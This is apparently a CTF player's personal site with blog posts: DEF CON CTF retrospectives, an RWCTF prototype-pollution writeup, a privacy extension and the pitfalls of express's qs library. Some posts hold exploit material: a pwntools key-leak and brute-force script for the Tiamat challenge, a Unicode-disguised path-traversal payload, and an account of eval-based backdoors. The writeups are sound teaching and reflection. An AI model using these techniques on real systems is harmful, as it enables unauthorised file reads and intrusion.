A computer scientist by trade and a hacker at heart, I live at the intersection of software development and information security.

I've helped start a company, Zensors, whose productization of novel computer vision techniques earned it customers around the world.

A long-time member of CMU's hacking team, PPP, I have won several international CTF competitions, including the world finals three times.

Projects

Hypatia
Kill Switch
Manus Dei
Aroma
Soustech
Shelf
Befungell

Blog Posts

Real World CTF RWDN: An Unnecessary Bug
Feb 01 2022

Although I ended up not spending much time on this year's RWCTF, I did (with the help of my awesome teammates) solve one problem: RWDN. The intended solution involved a bug in one of their middleware handlers that was designed incorrectly and allowed attackers to bypass a crucial check. However, I found that there was an alternate bypass that would have worked even if their code was correct. Let's discuss what the bug is, and why it could be a problem for "real world" applications.

Update

The author, @wupco1996, got back to me to let me know that this was actually the intended solution, and the other more obvious one was just a normal, everyday bug. Props to them for a really clever problem, and it goes to show that even the best security experts can slip up from time to time.

Original

As an added bonus, no crash means that we get to see the generated file name without having to compute the hash ourselves for part 2!

Broader implications

Obviously in this instance the impact stems in part from the decision to control the file access via query parameters. Yet, in order to exploit the prototype pollution, all we needed to do was access a file whose name was an integer greater than zero. Using numeric keys for forms is not that unusual of a practice, and it means that when using express-fileupload, the programmer cannot trust that a key is on req.files itself.

Fortunately, this is an easy fix, both for express-fileupload (which should replace instance = instance || {}; with instance = instance || Object.create(null);) as well as the user (who can install middleware that explicitly sets req.files to Object.create(null)).

All-in-all this is not a high impact bug, but it could have allowed RWDN to omit an intentional bug without impacting the problem's solvability, all while making it that much more "real".

Hacking from the Pool: A DEF CON 2021 Retrospective
Aug 11 2021

Much like the rest of the world, DEF CON CTF returned this year in a hybrid online/in-person format. For those who wanted it, space was reserved on the game floor to hack amidst the other teams that came to Vegas. For the rest of us who were still a bit nervous about large crowds, the infrastructure would be hosted online and accessible from anywhere in the world. Torn between the two choices, we opted this year for a middle ground: all of us together, but in a house 300 miles away.

[[toc]]

Introduction

Hello, Goodbye

DEF CON CTF is one of the most well known security competitions in the world. Often considered the World Finals (or "Olympics") of Hacking, teams qualify for it either by winning other notable competitions, or by placing high enough in its dedicated qualifier round.

As a consequence of the competition's longevity, and the onerous burden of running it, the organizing team ends up changing every couple of years. For the past four years, the CTF has been led by the Order of the Overflow, who have announced that this year's competition has been their last. Out of consideration for their hard work, and all of the new ideas that they've brought to the table, after I finish my retrospective I would like to take a moment to discuss their legacy and what future organizers can learn from their tenure (as viewed by a competitor).

One Final Hill to Climb

With that said, it is helpful to understand the competition that they ran before discussing what happened during it. This game was not much different from previous years, but to save you the trouble of looking at another writeup, I'll summarize the structure here.

DEF CON CTF takes place over three days and includes two different types of challenges. The most well known of these are Attack/Defense (A/D) challenges. Competitors can earn points for these in two ways; they score by attacking other teams and by preventing teams from attacking them. The scoring structure is such that attack points are earned for every team that they score against in a given 5 minute round, and defense points are earned when no team attacks them in a round (where at least one successful attack was launched).

Attacks may be launched directly against a team, in which case the network data will show evidence of the attack, or in "stealth" for full anonymity, but only half the points. Additionally, these services may be modified in such a way that functionality is preserved, but attacks no longer land. This process is called patching, and is the main way that defense points are earned.

As mentioned, there is another type of challenge called King of the Hill (KotH). These can be better thought of as =="games within the game"== and accumulate points differently.

Another substantial source of stress (physical as much as mental), is the frequent lack of sleep during the competition. As a result of problems remaining open overnight and new problems being released for overnight study, many competitors get only a handful of hours a night while the competition is ongoing. I recognize that this is a highly controversial opinion, but I would love to see an attempt to make DEF CON CTF a competition that you only play during the day.

Taken as it is right now, I don't think that the competition would support this style of gameplay effectively. Instead, intentional problem design would be needed not only to include a better range of bugs (shallow vs. deep), but a way to score differently based off of these bugs. The latter of these serving to incentivize finding deeper bugs. For instance, even if you can only earn points from it for two hours, if a deep bug is worth three times as many points as a shallow bug then it would still be worthwhile to exploit.

Experimentation

The final legacy of OOO I want to mention is their dedication to experimentation. Admittedly, this is a tricky one to discuss because I both appreciate it and find myself wary of it. Many of the details mentioned above are the result of experimentation from the Order. However, some of their other experiments where not always as successful.

Ultimately, what DEF CON CTF "should be" is really a question only the organizers get to answer. For some, it is an opportunity to find the best hackers in the world. For others, it is a chance to push the boundaries of the community and stretch it to its limits. For myself, DEF CON CTF is something more of climax — the event toward which the rest of the season points. The degree to which experimentation is relevant in this competition then depends largely on how you answer that question. I prefer it in moderation; a little experimentation keeps the game fresh, but I generally prefer stability to ambition in my problem design. Said differently, my hope for this CTF is that it reflects the best things that are happening in the community at the moment more than I want it to shape the community.

Final Thoughts

The Order of the Overflow has put an unimaginable amount of work into running DEF CON CTF over the past four years. The whole community owes them our appreciation for the sacrifices that they have made, and dedication that they have shown. They have also left an indelible mark on the competition, and one that will hopefully lay a strong foundation for future iterations.

As the CTF community continues to grow and mature, I suspect that DEF CON CTF will only further as a focal point for the players. As such, I hope that we as a community can encourage and support the next organizers who take on this mantle.

I would like to offer a final congratulations to the Order of the Overflow on a successful fourth DEF CON, and to celebrate Katzebin, Tea Deliverers, and all of the other teams who played incredibly well again this year. Great job everyone, and I am excited to see what next year brings!

Zach Wade is an alumnus of computer science at Carnegie Mellon University. He is also a member of the PPP, CMU's competitive hacking team. You can find him at @zwad3
Kill the Lights: Taking Control of Digital Privacy
Jul 06 2021

A few months ago I installed the latest Android beta, excited by its new design language. Three days later I had to uninstall it when I got stranded at the grocery store thanks to the Uber app crashing. However, in that short time I benefitted from another new feature (that iPhone users already enjoy) wherein the OS would notify me when an app used the clipboard. Excited by this, I took the same ideas and ported them to Chrome via an open source extension called Kill Switch.

Short on time? Download Kill Switch from the Chrome Web Store.

Browsers are easily one of the most impressive pieces of consumer technology in general use today. Not only do they offer developers a myriad of tools to create powerful applications with ease, they do so with a focus on security that is unparalleled in modern software development. With protections at every level of abstraction and a speedy update cycle, most users are at ==little risk== of having their data compromised by bad actors.

At the same time, the sheer quantity of APIs exposed means that the potential attack surface is huge. Even then, just because something is not a security risk, doesn't mean it isn't a privacy risk. A great example of this is WebGL, which has been used historically as a means of fingerprinting devices due to the eccentricities of different hardware. Obviously, this cannot be used to actually leak data directly, but it can be used to coarsely track people, thus violating user's privacy.

Just as with security, browsers are continuously adding mitigations to prevent these types of abuses. However, they do so opaquely and offer little insight to end users about what risks they are being exposed to. Since privacy is inherently personal, and every individual has different thresholds of acceptability, I believe that users should have the tools and opportunity to easily control their exposure.

Kill Switch

For my own use, and for those with similar proclivities, I took several of these abusable APIs and wrote a Chrome Extension to monitor them. Per-site, it provides users with several configurations options for each of these APIs. Namely, it can unconditionally enable or disable them, notify the user when they're being invoked, or prompt the user for permission on first access.

This is the part, unfortunately, where I need to reiterate that this is intended to be a privacy tool, not a security one. Although I take steps to run Kill Switch before any of the other scripts on the page, a dedicated developer could certainly find ways to bypass it. As a consequence of these adversarial cases, if you are worried about any particularly sensitive APIs, please disable them at the Browser, OS, or even hardware levels. Any of those will provide you with far better guarantees.

With that said, however, for casual web browsing, Kill Switch is an unobtrusive way to get unique insight into what websites are collecting on you, and in many cases will give you the power to put a stop to it. Plus, it's fully open source and open to contributions!

The Bigger Picture

At the end of the day, Kill Switch is neither novel, nor technically impressive. Yet, I think it's a useful piece in the ongoing dialogue of digital privacy in an increasingly technocratic internet. Over the next few years this conversation is only going to become more difficult and more important.

If this is something that interests you, I would encourage you to think about what digital privacy looks like, and how we can start to move in the right direction. Projects like these are a good way to prototype ideas and experiences, but even just organizing your thoughts into a blog post or article can be a great way to spur discussion. If you do, please share it with me on twitter or by email! I'm excited to see where the next few years take us.

The Many Heads of DEF CON Quals
May 04 2021

When you get right down to it, I'm a web guy. I know JavaScript back to front and can spot an SSRF a mile away. So what am I supposed to do when DEF CON ctf has no web?? Dust off IDA and remember how to reverse... 8 different architectures at once.

The Slow Realization

Tiamat was a reversing problem released near the halfway point of DEF CON CTF Quals. Having just solved Rick, a different reversing problem, I was at least warmed up (and resigned to the lack of web). The download came with all of the materials needed to build the problem yourself, including a Dockerfile, an executable, and concerningly, ==a custom build of Qemu==.

We also noticed that the v function would also xor the desired key with urandom before checking it, unless the joshua backdoor had been activated, in which case it would just check it normally.

Finally, and most crucially, we found that after at least one validation attempt, for every use of the n command, the p command would print one byte past the user's input into the xored buffer. However, due to limits on how many times n could be invoked, this would only leak 27 of the 32 characters of the encrypted key.

This was quite strange, and we tracked it down to a register called r0 on instruction 0x102bc, but could never figure out what it was being assigned to. We noted it down as an oddity of the system, and went on our way.

However, since the data that was being leaked was the encrypted key, and the encryption key was only 4 bytes long, we realized that we could simply try all the keys one byte at a time to see which ones gave us valid ascii hex characters. Scripting this was straightforward, and yielded 8 possible prefixes:

from typing import List, Tuple
import itertools

from pwn import *

def solve(data: bytes):
    def brute_set(bs: bytes):
        res: List[int] = []
        for i in range(256):
            success = True
            for b in bs:
                if chr(b ^ i) not in "abcdef0123456789":
                    success = False
                    break
            if success:
                res.append(i)

        return res

    def try_key(key: Tuple[int, int, int, int]):
        return "".join([
            chr(d ^ key[i % 4])
            for i, d in enumerate(data)
        ])

    a = brute_set(data[::4])
    b = brute_set(data[1::4])
    c = brute_set(data[2::4])
    d = brute_set(data[3::4])

    keys = itertools.product(a, b, c, d)

    for key in keys:
        print(try_key(key))

connection = remote("tiamat.challenges.ooo", 5000)

connection.send("e00000000111111112222222233333333v")
connection.recvuntil("""Authorization failed!
READY
""")
connection.send("np" * 25)

for i in range(25):
    connection.recvuntil("00000000111111112222222233333333")
    data = connection.recvuntil("\nREADY")[:-6]
    if len(data) > 26:
        print("------")
        solve(data)

Yielding

d64ce88b7426f0245c5102f91a9
d64be88c7427f0255c5002f81a9
c64cb88b0426a0242c5172f96a9
c64bb88c0427a0252c5072f86a9
764c688bd4265024fc51c2f9ba9
764b688cd4275025fc50c2f8ba9
064c188bc4262024ac51d2f9ea9
064b188cc4272025ac50d2f8ea9

With Apologies to OOO's Infrastructure

At this point, we had only two and a half hours left in the competition, and were in a close third place. Sleep had been a luxury all weekend, and I was less than confident in our ability to find the missing piece of the puzzle. However, we had found 8 possible prefixes, missing only 5 nibbles each, for a total of 23 bits of entropy.

Now, for those keeping score at home, this means that there were a total of 8,388,608 possible keys to try. On a whim and a prayer, I hacked together a script to try all of them. Limiting myself to 32 simultaneous connections (in hopes that it wouldn't prevent other players from hitting the problem) and 8 checks per connection, I was able to achieve a throughput of roughly 250 keys per second. Unfortunately, this meant that I only had roughly a 1 in 4 chance of solving it before the competition ended. My options at this point were: risk causing a DOS for other teams, or eat the 25%.

Ultimately, I decided that since this was almost certainly not the intended solution, I should not risk making the service unavailable, so I accepted the fact that I was unlikely to actually get the flag.

However, by sheer luck, the flag happened to be in the first 1.8 million or so of my enumeration. Thus, with only 30 minutes left in the game, I was able to solve the problem and we took the lead.

The Missing Link

Speaking to the problem's author afterward, I realized just how close we had come to solving it the intended way. That register I mentioned earlier, r0, whose value I couldn't pinpoint was actually the result of a sys_open ARM syscall. That call returns the number of open file descriptors of the program, a number that was ever increasing due to a mishandling of close in the n command. Howeverw I had noticed a while back that the v command also did not close its file descriptor. I assumed this was just a bug, since I didn't see any way to use it.

Consequently, if we had caught the origin of that register, we would have had all the information we needed to solve it with only 8 tries, not 8 million.

Thanks

Regardless of my own ineptitude, Tiamat was an excellently silly challenge, and a lot of fun to solve. Full kudos to Erik for putting it together, and to my teammates for solving it with me!

Kernel Panic: A DEF CON 2020 Retrospective
Aug 17 2020

In many regards, 2020 has felt like a collective Blue Screen of Death. However, a raging virus was not enough to keep DEF CON from happening. This year it booted into Safemode, an online-only version of the popular security conference. Along with it, the titular DEF CON CTF reimagined itself for a virtual future.

1 Minute to Midnight

DEF CON is an annual conference traditionally held in Las Vegas during the summer. A bizarre mish-mash of hardcore hacking and excessive partying, most members of the infosec community will find themselves visiting it at least once. This year, 16 teams of hackers from over 1500 qualified for it's most well-known competition, DEF CON CTF.

As in previous years, I competed in DEF CON CTF with Carnegie Mellon's hacking team, the Plaid Parliament of Pwning (PPP). Similarly, the Order of the Overflow returned to host. Although we did not win, it was an exciting competition with difficulties and challenges unique to these times.

Postpandemic Cyberwarfare

A solid foundation

In what was a huge relief, the game this year was very similar to previous years. I've covered this before so I'll keep this section short, but the game consists of roughly 300 rounds wherein teams can score points by

  • Attacking other teams: Teams will score 1 attack point (or 0.5 points as I'll explain momentarily) for each flag of their opponents that they steal.
  • Defending their services: Teams will score 1 defense point for each of their services that is not successfully attacked in that round (while there is at least one opponent who is under active attack)
  • Scoring well in King-of-the-Hill challenges: For each KotH challenge, the current best scorer will earn 10 points, second best 6, then 3, 2, and 1. Teams below the top five do not score.

Gameplay proceeds with teams exploiting, patching, and competing with each other every round to score as many points as they can before the next round. In this regard, the game was almost identical to previous years. The ==only substantial change== was related to network captures.

At the same time, problems often have components that are unrelated to the actual challenge itself. For instance, whether my XSS victim is named "admin" or "root" is probably irrelevant to the actual exploit. I think it could ease a lot of frustration to have this distinction codified in a public FAQ where non-critical questions are answered in full view of the competition, whereas exploit adjacent questions are given a friendly "Hack Harder."

By collecting this information publicly, and by being slightly more generous with the information we provide, we as organizers might be able to make our problems more enjoyable and educational for those playing. I say "we," because I have an opportunity to try this out as one of the organizers of PlaidCTF. I might start with a single problem, but this could be a valuable method for improving the communication between players and organizers, and in relieving many irrelevant frustrations.

Until Next Year

As always, DEF CON CTF really shows its merits as one of the biggest CTFs of the year. Especially given the circumstances of the competition, I want to thank the Order of the Overflow for the hard work they put in to making this happen.

Additionally, I want to thank all of my teammates and friends who played an incredible game, and who make even stressful CTFs fun sorry I was so useless this year, oops.

Finally, I want to offer all of our competition a hearty congratulations on a job well done. We saw a lot of creativity and ingenuity in the attacks and patches everyone levied. To A*0*E especially, congratulations on your hard-earned win. It has been many years coming.

And to everyone, I look forward to seeing you during PlaidCTF and future DEF CONs. Thanks!

Zach Wade is an alumnus of computer science at Carnegie Mellon University. He is also a member of the PPP, CMU's competitive hacking team. You can find him on Twitter as @zwad3
PlaidCTF 2020: Making the Watness 2
Apr 26 2020

For PlaidCTF this year, I created a demake of The Witness in Hypercard. Since most of the technology I used is over 20 years old, and a lot of the documentation seems lost to time, I created a short video that discusses how I made it, and what resources I used in order to make it happen.

Inspiration

In addition to The Witness itself, my main source of inspiration was this interview from Ars Technica.

Code

All of my code can be found on Github.

Tools

Nearly all of the development of The Watness was done inside of OS 9. Here are the tools I used for that

  • SheepShaver: SheepShaver is a PowerPC emulator designed specifically for running classic versions of Macintosh OS.
  • Macintosh OS 9: Although Myst was likely developed on System 6/7, I went ahead and used OS 9 because it was easier. Nearly everything that I've used here will work on System 7 if you choose, but you may need older versions of them.
  • Hypercard 2.4: Hypercard is the tool that The Watness is built in. You will need a copy of Hypercard to both play and edit any files associated with the game.
  • QuickTime 4: Hypercard comes with QuickTime 3, but I was unable to get it to display JPEGs without crashing. Upgrading to QuickTime 4 solved this problem.
  • Macintosh Programmer's Workstation: MPW is an IDE (ish) for writing native code in OS 9. I used the Gold Master edition, but any "recent" version should work. If you install GM, however, you will also need to separately install Apple Pascal.
  • ResEdit: ResEdit allows you to view the resource forks of files. This isn't needed to make the challenge, but is helpful in understanding how it all works.
  • Stuffit Deluxe: Stuffit is a suite of compression/archival utilities for Macintosh systems that properly handles binary data and resource forks.

In addition to the OS 9 utilities, I also used typescript for all of my offline scripts.

References

The vast majority of my time was spent trying to piece together an understsanding of how everything works from the limited documentation I could find. Here is a list of what I used, annotated with what I took away from it.

  • XCMD Cookboox: This is an interesting introduction to how XCMDs work. It has a lot of useful information, but do not use any of the code. I got sucked down a rabbit hole of trying to make this code work, only to find out many hours later that the framework referenced therein had been since superceded by a built-in library called HyperXCMD.
  • All MPW Pascal Interfaces: I stumbled across this while trying to make the previous code work. It contains the only documentation I could find of the HyperXCMD library. There are a few things to note,
    • If you're using the HyperXCMD library, you will almost certainly also want the Types library. A lot of the code I saw used MemTypes instead, but I did not have this installed. Types however contained all of the structures that I actually needed.
    • EvalExpr is not eval in the modern sense of the term. Instead, it parses the input as though it were a Hypertalk statement, but does not run it. To execute the resulting handle, use RunHandler.
    • There are 3 types of strings referenced. Str/Pas, Zero, and (sometimes) Handle. A handle is a Hypertalk string, and a Pas is a pascal style string. Zero took me some time to figure out, but it's a C-style string (null or "zero" terminated).
  • Hypertalk Script Language Guide: An excerpt from an early book on programming for Hypertalk.
  • The Apple Pascal Docs: A somewhat helpful guide to writing Apple Pascal. It was missing a lot of useful information, but it gave me enough so that I could piece the rest together.
  • The HCSC Color Tools Guide: A hypercard stack that goes into minimal detail about how to use Color Tools.

Final Thoughts

This project was a lot of fun, and taught me more than I ever expected to know about developing for classic Macs. If you have any questions about the project, or need help with your own, please feel free to reach me by Twitter (@zwad3) or by email ([email protected]).

The Lies We Tell Ourselves
Dec 27 2019

With 30,000,000 weekly downloads, it's reasonable to expect that qs has been written from the ground up to be efficient, secure, and robust. Unfortunately, as is often the case with small projects that become unexpectedly big, it is plagued by legacy options and sibylline code. Without understanding how it really works, it is incredibly difficult to use safely.


Modern engineering is built heavily on trust. We trust hardware manufactures to build predictable devices. We trust operating system developers to implement secure protections. Most commonly, we trust libraries to chose safe paradigms. This trust is essential for nearly all development, however, it can sometimes be misplaced.

When we naïvely use someone else's work, we allow ourselves to be blindsided by the mistakes that they have made. As a result, it is critical to understand not just what we are using, but how it actually works. From there, we can develop ways to protect ourselves and our users.

A Case Study

Constantly trying to understand every library and service you use may seem sisyphean. However, even the most basic tools can have nasty side effects. To illustrate the dangers of blind trust, we are going to take a deep dive into express.js, and more specifically, the popular library qs. When reading this, keep in mind that more than 5 million packages use this library.

The Good

For most use cases, express is the best server framework for writing web applications in Node. Even when you use a different web framework, there is still a high probability that it is using express under the hood. There's nothing inherently wrong with this; by-and-large express is reliable and well designed. However, in an attempt to make user's lives easier, it includes additional somewhat hidden functionality.

Consider this very basic server example:

import * as express from "express"

const app = express();

app.get("/", (req, res) => {
    // Access the query string from the URL
    let obj = req.query.obj;
    res.send(typeof obj);
});

app.listen(3030);

==What are the possible values that you can receive back from the server?==

With these two checks in place, using qs becomes safe and reliable. Even when qs decides to produce a type that was previously unexpected, with a reliable marshaller, this will be caught immeddiately.

The Lies We Tell Ourselves

Regardless of how you address these problems, it should be clear at this point that the web of trust we weave is fragile, and can fall apart anywhere. No one will ever completely understand every single thing that makes a computer work, but when we drop our presumptions of safety, we become more equipped to prevent problems before they happen.

I have tremendous respect for everyone who has worked on qs over the years. Maintaining an open source package is challenging in the best of times, but trying to ensure that your changes don't break half the web must certainly be daunting.

In writing this article, my hope is not to publicly shame the project, but help illustrate how messy modern development can be. I would encourage everyone to critically evaluate everything that you trust, and once you understand it, share it with the rest of us.


Zach Wade is an alumnus of computer science at Carnegie Mellon University. He is also a member of the PPP, CMU's competitive hacking team. You can find him at @zwad3

Here We Go Again: A DEF CON 2019 Retrospective
Aug 15 2019

As the Vegas festivities wrap up, I once again have an opportunity to reflect on the year's biggest CTF and the culmination of my time as an undergraduate with the Plaid Parliament of Pwning. I'm looking forward to playing with them as an alumni, but now is a good time for me to share some of my thoughts with the rest of the community and to hear what everyone else is thinking.

With that in mind, let's talk DEF CON!

It's hard for me to believe, but this post marks the fourth DEF CON retrospective I've done. In the past I've mostly talked about the experience without going into much depth on the problems, but I got some feedback this year that people wanted more technical detail. As a result, this years writeup is a lot longer (and a little bit later), but covers every problem in varying degrees of technicality.

What is DEF CON

DEF CON CTF is the premier security competition. Occurring annually at the same time as the eponymous conference, the competition tasks qualifying teams with hacking into vulnerable services for the purposes of extracting hidden pieces of data called "flags". For this reason, this competition — as well as others like it — are called capture the flags (CTFs).

What separates DEF CON from other similar competitions is primarily the importance placed on it by the community, and the work that goes into organizing it. Not only is it highly contested by many of the world's best hackers, but it employs an attack/defense style of gameplay that pits competitors directly against each other in a frenetic and chaotic manner. As with most such competitions, not only are players allowed to attack each other's services, they are also expected to protect their own by removing the bugs.

For the past two years, DEF CON has also introduced a third type of of gameplay called King of the Hill (KotH). This game style is somewhat unique to the current organizers, the Order of the Overflow, who introduced it when they took over the competition from its previous organizers, the Legitimate Business Syndicate. As the name suggests, King of the Hill differs from traditional attacking in that it challenges teams to outperform their opponents in some sort of hacking related competition. As a result, for any given DEF CON round, teams can do any of the following actions:

  1. Steal a flag (once per service per opponent)
  2. Upload a patch (once per service)
  3. Attempt the King of the Hill

Consequently these are also the ==three ways that teams may score points.==

FeverDream.js

After everyone got settled the next day, throughing exploits and deploying patches, it was time for the promised final problem, jtaste. In a move that should surprise no one at this point, it was a web problem. However, unlike the previous problems which were more web-adjacent, this one was an honest-to-goodness run-the-gauntlet web problem.

The only issue with it? It made absolutely no sense.

Without writing any code, let me describe how this problem worked when used correctly.

  • Users were shown a 5x5 grid, a clear button, and a submit button
  • When you hovered over a grid element, it added a corresponding number to a chain shown at the top, as well as sending that number and its "signature" to the server.
  • The server verified that the signature was correct, then appended just the signature to a session variable called verified
  • When you clicked submit, it would send those values shown at the top, to the server. The server would then check the length of what you submitted against the length of verified. If they didn't match, it would complain at you. If it did match, however, then it would the session variable counter to be the array of numbers you uploaded.
  • Then, if you hit the /persistent endpoint, it would
    • Filter out all of the 46 and 47s from the array (ascii codes for "." and "/" respectively)
    • Prepend an array that had the character codes for "./public'
    • Call unidecode on every element of the resulting array
    • Convert that into a string
    • Read the contents of the file referenced by that string
    • Write the stringified original array to that file
    • Return the original contents to the user

...what?

I wish I could give you a nice interpretation of what this program was supposed to be simulating, but honestly it made no sense to me whatsoever. Fortunately, just from that description it should be obvious what the solution is.

Simply create a string for the relative path you want to read, such as ../../../../flag, convert all of the characters to their char code, replace all of the 46s with 8228s ("one dot leader"), and the 47s with 1793s ("syriac supralinear full stop"), and then for each letter, send any number and signature from your session to the server, then send the array you produced from your path to the server, then call /persistent.

Likewise, this also becomes trivial to patch because you can simply wait until the flag is being read, then replace the flag value with a boring string (in our case xxx), and no one can solve the problem with this method.

This solution got us a few points while people where still understanding how it worked, but everyone shut it down pretty quickly. Depending on how people patched it, however, we were still able to use it to leak their server code, allowing us to read their patches. In a few other cases, they were just preventing you from reading /flag, so we could get around this by reading /proc/self/root/flag. While this allowed us to still get 3 teams every round, it was only a drop in the bucket.

The problem was using webpack-hot-reload which seems like it was supposed to be an alternate solution path wherein you overwrite one of the webpack'd source files to get it to include the flag from elsewhere, however I was not able to use this setup to perform any kind of write outside of the /public directory. As such, I could find no way of getting webpack to pick up any of the files I had written.

While I generally like the fact that there was an easy web problem to finish the game, this one did not make much sense to me as a problem, and seemed a little bit too easy to be anything more than just something to keep people busy.

Good Vibes

As the competition wound down, and before I started to clean everything up, I had a little bit of time to reflect on the year's competition. Overall, despite some problematic problems, and some bad networking on my part, I found it to be one of the most fun DEF CONs I had played in. In part, this was because I broke from my normal routine of just playing defense. While useful, especially given our propensity for it, defense is rarely the most interesting role to play.

Yet, a lot of the fun this year came from the fact that the problems were just, well, fun. Even jtaste, the silly web problem released at the end, was low stakes and amusing enough to be enjoyable. Additionally, either due to the space we had, or the OOOs benevolence, the CTF atmosphere was significantly calmer this year. Its hard for me to overstate how much of an impact this has on my ability to enjoy the CTF. As cool as GoogleCTF-style visuals and sound effects are, when you're in the middle of a stressful competition, all they do is elevate that stress. Even the loud memes that were on display last year really did not make for a pleasant workspace. Fortunately, this year's combination of CTF-related visuals, relatively calm music and videos, and the pleasant whitenoise of people talking around you made for an overwhelmingly better evnironment.

Another thing that made this DEF CON more pleasant was that the OOO's infrastructure and problem development had clearly matured. While there were certainly some issues, they were far less impactful and frustrating than in last year's DEF CON. It's great to see the way that they are learning from each competition, and improving it.

Aiding this fact is likely their decision to keep the format the same as last years. I understand that not everyone is a fan of King of the Hill, but I think they made the right call in keeping with a familiar gameplay style so that they could focus on the less exciting but just as important aspects of the game. Knowing them, I'm sure they'll want to experiment further next year, yet as nervous as that makes me, I'm much less worried having seen how things went this year.

Addressing the Future

Although this year's game went very well, there are still a few things that can be improved upon by future hosts.

The biggest concern we had was the rate limiting method employed. Inherently, we're not opposed to rate limiting. Ensuring that no one abuses the infrastructure is crucial in ensuring a smooth game. However, the policy of "if you exceed your quota, we immediately disconnect you" leads to a lot of trepidation when approaching new problems. A prime example of this was Super Smash OOOs. As mentioned prior, there was a SQL injection in the remote server that you had to find blind. One of the reasons we did not find this is because none of our members were willing to poke around the production instance of the problem for fear of disconnecting us from the game. If the policy had been softer — i.e. temporary dropped packets or even public shaming — it is far more likely that we would have explored that avenue.

Likewise, another issue that we struggled with this year was understanding the problem scopes. As mentioned, there was the issue with SQL injection in a wasm problem, but there was also a lot of time spent elsewhere. For instance, in the shellcoding problem, we tried a few things to attack the problem runner itself instead of solving the original problem. For that one, Shellphish claims they actually had an exploit running against buggy server code before the organizers patched it. While I understand the value of having players look for alternate solutions to problems (thinking out of the box as it were), In a competition like DEF CON, it's important to have a well defined scope for problems.

The only other feedback I have is largely unchanged from last year. The problem health indicators, which have 5-ish states ranging from good to bad still feel really arbitrary. Problems sometimes jump multiple states at once, and knowing something is at ok, for instance, does not actually give competitors a good feel for how much longer it will be up. Arbitrary problem lifetimes is certainly not an issue unique to the OOO's games, but it is more obvious as a result of the health indicators. I think they're a great idea, but they need a little bit more consistency to actually be helpful.

I can't say this enough, but thank you to the Order of the Overflow for all of the sacrifices they make in order for DEF CON CTF to be successful. In a similar vein, congratulations to all of the other teams who played this year. Coming to DEF CON is so much fun in part because its an opportunity to see all of you and enjoy the greater CTF community. In particular, congratulations to both HITCON⚔Bfkinesis and Tea Deliverers who played phenomenally this year. It's incredible to see just how many brilliant hackers there are in this community.

Final Thoughts

This writeup has gone far longer than I had intended it to, and I imagine not many people will make it this far. But I wanted to take this opportunity to pose a few questions for the community as we move into this new season.

  1. What is the purpose of CTF? Do we play it to make ourselves better hackers, to push the boundaries of what we can do, or simply for the love of the game.
  2. What's keeping people away from it, and what can we do about it? A couple of teams opted not to attend DEF CON this year which is always sad to hear.
  3. What crazy things do you secretly hope that OOO does next year? How do they make it work well?

I'm always curious what people are thinking, feel free to comment, write your own long blog post, or tweet me. Thanks!

Zach Wade is an alumnus of computer science at Carnegie Mellon University. He is also a member of the PPP, CMU's competitive hacking team. You can find him at @zwad3
Welcome to the New Order: A DEF CON 2018 Retrospective
Aug 15 2018

On August 12th, 2018, the Plaid Parliament of Pwning earned second place in DEF CON CTF, one of the most competitive hacking competitions in the world. Placing ahead of us this year were our colleagues on DEFKOR00T, marking their second such victory over the past four years. Although this year I cannot provide an account of the how the winning team played, we still have many great stories to tell, and we learned a lot from DEF CON 2018.

A Brief Introduction

For each of the past three DEF CONs, I've provided a retrospective (2016 and 2017) on what the experience was like for our team, the PPP. I enjoy writing these and sharing my perspective on the competition, and I hope that you will join me for a in-depth look at one of the most exciting security competitions in the world.

Imposing Order

2018 marked the Order of the Overflow's first year as DEF CON CTF organizers. LegitBS (the group that ran the previous five competitions) was a hard act to follow, but the OOO had a rockstar team. Led by the ever amusing Zardus, the OOO contains players from Shellphish, organizers of iCTF and Boston Key Party, Professors, and long-time CTFers. Furthermore, they had accepted this new position on a promise of shaking things up a bit and trying something new. We had a ==few ideas about what this might be==, but even our vivid imaginations were not prepared for this new Order.

doublethink

On a bit more of a fun note, the KotH challenge doublethink challenged teams to write a single 4096-byte shellcode that could run on as many of 12 different architectures as possible. For reference, these architectures were

  • lgp-30
  • pdp-1
  • pdp-8
  • pdp-10
  • mix
  • ibm-1401
  • nova
  • risc-v
  • hexagon
  • mmix
  • clemency
  • One of: amd64, arm64, or mipsel

By the time the competition had retired, our team was in third place with shellcode that ran on 8 different architectures (amd64, lgp30, mix, pdp1, pdp8, pdp10 clemency, and nova). We were blown away by Dragon Sector with 9, and HITCON who had achieved a whopping 11. However, as we later found out, both of those two teams had found a bug in the problem that let them claim success for far more architectures than they actually supported. On the plus side, it was a ton of fun writing each of those shellcodes!

bew

The final problem we will discuss in depth is bew. Bew is the first "web"-challenge that I have ever seen at DEF CON finals. It initially presented itself as a web-assembly (WASM) reversing problem, although after about 15 minutes of reading through it, it became apparent that the WASM was there primarily to masquerade the fact that all input to the problem was being evalled. Since it was released only about an hour before the end of the day, most teams were content with using that eval to copy the flag onto a publicly accessible page where it could be read directly. In fact, even the teams who did not find the bug realized that they could troll this page and submit any flags they found.

The real issue with bew's design became evident the next morning. Having had all night to play around with it, teams quickly realized that they could use this entry point to establish a permanent backdoor on other teams' servers that also removed the main entrypoint. Unfortunately, since everyone realized this, the first round of the day was simply a race to see who could get their backdoor installed on as many people's system as possible. PPP unfortunately lost this race, but got lucky insofar as whomever backdoored us did so in a way that logged everyone else's backdoors to a public place. This meant that we had the source code for several teams' (insecure!) backdoors and were able to use those to get flags from other teams.

Notes, Issues, and Requests

While DEF CON finals were a lot of fun, they were not without issue either. The OOO took on a huge task this year, and with twice as many teams there are twice as many points of failure. Before I begin discussing some of these problems, I want to commend the OOO for their transparency throughout the whole process, and their eager willingness to make things right. An attitude like that is far more valuable than perfect infrastructure, because it resonates in every aspect of the competition. With this in mind, let's briefly discuss a few of the issues with the competition, and how we hope to see them changed.

Infrastructure Problems

These are the easiest to discuss, because everyone knows that this is an impossibly hard problem, and no team ever gets it perfect. The only specific worth mentioning is that when one of these problems affected our ability to score for a substantial portion of time, there was not really any good recourse. This is not to suggest that the OOO had an option they chose not to take, but rather as a result of this error there was no fair way to restore us those points. This can be a frustrating situation for all involved, and hopefully in the future a better recovery method can be implemented.

Gameplay Errata

With regard to some of the decisions made for the competition itself, these provide for a lot more discussion. First, I would like to express how much I enjoyed the new King-of-the-Hill mode. It added some much needed variety to the competition that really helped it to feel fresh and fun. In a similar vein, several members of our patching team mentioned that the limited-byte patching method made their job harder, but a lot more fun. It meant that they had to do a lot more by hand, but it was an exciting challenge.

